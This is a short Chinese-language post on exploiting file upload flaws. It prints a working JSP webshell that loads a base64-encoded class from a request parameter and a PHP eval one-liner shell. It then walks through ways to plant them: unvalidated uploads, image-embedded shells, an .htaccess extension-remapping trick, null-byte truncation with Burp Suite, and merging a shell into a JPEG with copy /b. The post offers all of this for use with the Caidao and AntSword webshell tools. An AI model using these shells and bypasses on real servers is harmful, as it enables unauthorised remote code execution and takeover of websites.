前提:一句话木马,可用php、jsp、asp等;学会选择小马(什么语言环境写的马就用什么语言的马),工具菜刀、蚁剑(功能全)等
附一个jsp马
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
php马
<?php eval(@$_POST['a']); ?>
1.被上传的环境不存在任何类型的验证
直接上传漏洞,菜刀直接连接即可
2.上传图片马
可以被利用的条件是:能够上传成功;上传后直接访问并能够生成我们的小马.jsp或者.php等
符合上面条件直接上菜刀
3.黑名单绕过
例如上传的类型不可为jsp、php等等脚本语言的类型文件
上传一个内容为jsp小马代码的txt文件,并且上传一个重写文件拓展名的.htaccess文件;
<Directory />
Options FollowSymLinks
AllowOverride All
AddType application/x-httpd-txt .jsp #将.txt后缀的文件作为jsp文件解析
</Directory>
上传成功后上菜刀,尝试连接
4.00截断
将burpsuite抓包到的上传数据包的文件名改为1.jsp.txt ;将"."hex值 改为00,放包
5.某不知名方法
抓包,将上传的文本内容写的特别长,导致内存溢出..上传成功
补充:制作一句话图片木马
利用windows的copy
copy phto.jpg/b+muma.php muma.jpg